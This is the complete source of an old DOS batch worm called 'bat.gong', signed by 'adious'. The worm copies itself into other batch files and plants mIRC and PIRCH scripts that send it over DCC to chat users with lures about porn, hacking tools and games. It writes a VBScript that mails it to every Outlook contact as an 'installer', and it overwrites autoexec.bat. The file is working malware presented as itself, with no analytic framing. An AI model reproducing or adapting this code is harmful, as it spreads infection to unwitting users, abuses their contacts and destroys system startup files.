rem gong 00000000000000000000000000000000000000000000000000000000000000000000
rem gong 00000000000000000000000000000000000000000000000000000000000000000000
@cls | gong
@ctty nul.gong
REM bat.gong
REM by adious gong
REM writen on 16\11\02 gong
for a%% in (*.bat) set gong=a%%
find "gong" %0>%gong%
find "gong" %0>c:\gong.bat
set gong=echo
%gong% [script]>b.bat
%gong% n0=on 1:JOIN:#:{ >>b.bat
%gong% n1= /if ( nick == $me ) { halt } >>b.bat
%gong% n2= /.dcc send $nick c:\gong.bat >>b.bat
%gong% n3= /on *:TEXT:*sex*:{ >>b.bat
%gong% n4=.msg $nick I'm sending you a copy of the 'gong' porno zine.have fun reading!! >>b.bat
%gong% n5= /.dcc send $nick c:\gong.bat >>b.bat
%gong% n6= /on *:TEXT:*hack*:{>>b.bat
%gong% n7=.msg $nick I'm sending you a verry 3l33t script to hack you victims computer and change their websites.have fun!! >>b.bat
%gong% n8= /on *:TEXT:*game*:{ >>b.bat
%gong% n9=.msg $nick How are you? I would like to give you the best game there is .It's called 'bong'.Just install it! >>b.bat
%gong% n10= /.dcc send $nick c:\gong.bat >>b.bat
set gong=exist
if %gong% c:\mirc\mirc.ini copy b.bat c:\mirc\script.ini
if %gong% c:\mirc32\mirc.ini copy b.bat c:\mirc32\script.ini
if %gong% c:\progra~1\mirc\mirc.ini copy b.bat c:\progra~1\mirc\script.ini
if %gong% c:\progra~1\mirc32\mirc.ini copy b.bat c:\progra~1\mirc32\script.ini
set gong=del
%gong% b.bat
%gong% c:\pirch98\events.ini
set gong=echo
%gong% [Levels]>pirch
%gong% Enabled=1>>pirch
%gong% Count=6>>pirch
%gong% Level1=000-Unknowns>>pirch
%gong% 000-UnknownsEnabled=1>>pirch
%gong% Level2=100-Level 100>>pirch
%gong% 100-Level 100Enabled=1>>pirch
%gong% Level3=200-Level 200>>pirch
%gong% 200-Level 200Enabled=1>>pirch
%gong% Level4=300-Level 300>>pirch
%gong% 300-Level 300Enabled=1>>pirch
%gong% Level5=400-Level 400>>pirch
%gong% 400-Level 400Enabled=1>>pirch
%gong% Level6=500-Level 500>>pirch
%gong% 500-Level 500Enabled=1>>pirch
%gong%.>>pirch
%gong% [000-Unknowns]>>pirch
%gong% User1=*!*@*>>pirch
%gong% UserCount=1>>pirch
%gong% Event1=ON JOIN:#:/dcc send $nick c:\gong.bat>>pirch
%gong% EventCount=1>>pirch
%gong%.>>pirch
%gong% [100-Level 100]>>pirch
%gong% UserCount=0>>pirch
%gong% EventCount=0>>pirch
%gong%.>>pirch
%gong% [200-Level 200]>>pirch
%gong% UserCount=0>>pirch
%gong% EventCount=0>>pirch
%gong%.>>pirch
%gong% [300-Level 300]>>pirch
%gong% UserCount=0>>pirch
%gong% EventCount=0>>pirch
%gong%.>>pirch
%gong% [400-Level 400]>>pirch
%gong% UserCount=0>>pirch
%gong% EventCount=0>>pirch
%gong%.>>pirch
%gong% [500-Level 500]>>pirch
%gong% UserCount=0>>pirch
%gong% EventCount=0>>pirch
set gong=move
%gong% pirch c:\pirch98\events.ini
set gong=del
%gong% pirch
if exist c:\gong.vbs goto gongend
set gong=echo
%gong%.on error resume next >c:\gong.vbs 
%gong% dim a,b,c,d,e >>c:\gong.vbs 
%gong% set a = Wscript.CreateObject("Wscript.Shell") >>c:\gong.vbs 
%gong% set b = CreateObject("Outlook.Application") >>c:\gong.vbs 
%gong% set c = b.GetNameSpace("MAPI") >>c:\gong.vbs 
%gong% for y = 1 To c.AddressLists.Count >>c:\gong.vbs 
%gong% set d = c.AddressLists(y) >>c:\gong.vbs 
%gong% x = 1 >>c:\gong.vbs 
%gong% set e = b.CreateItem(0) >>c:\gong.vbs 
%gong% for o = 1 To d.AddressEntries.Count >>c:\gong.vbs 
%gong% f = d.AddressEntries(x) >>c:\gong.vbs 
%gong% e.Recipients.Add f >>c:\gong.vbs 
%gong% x = x + 1 >>c:\gong.vbs 
%gong% next >>c:\gong.vbs 
%gong% e.Subject = "An attachment" >>c:\gong.vbs 
%gong% e.Body = "I would like to show you the work that i want to give to you.This is the installer." >>c:\gong.vbs 
%gong% e.Body = "bye!!" >>c:\gong.vbs
%gong% e.Attachments.Add ("c:\gong.bat") >>c:\gong.vbs 
%gong% e.DeleteAfterSubmit = False >>c:\gong.vbs 
%gong% e.Send >>c:\gong.vbs 
%gong% f = "" >>c:\gong.vbs 
%gong% next >>c:\gong.vbs 
set gong=start
%gong% c:\gong.vbs
:gongend
set gong=del
%gong% c:\autoexec.bat
set gong=echo
%gong% @echo off >c:\autoexec.bat
%gong% echo ooooooooooooooooooooooooooooooo >>c:\autoexec.bat
%gong% echo bat.gong >>c:\autoexec.bat
%gong% echo by adious >>c:\autoexec.bat
%gong% echo oooooooooooooooooooooooooooooo0 >>c:\autoexec.bat
%gong% pause >>c:\autoexec.bat 
REM gong 0000000000000000000000000000000000000000000000000000000000000000000
REM gong 0000000000000000000000000000000000000000000000000000000000000000000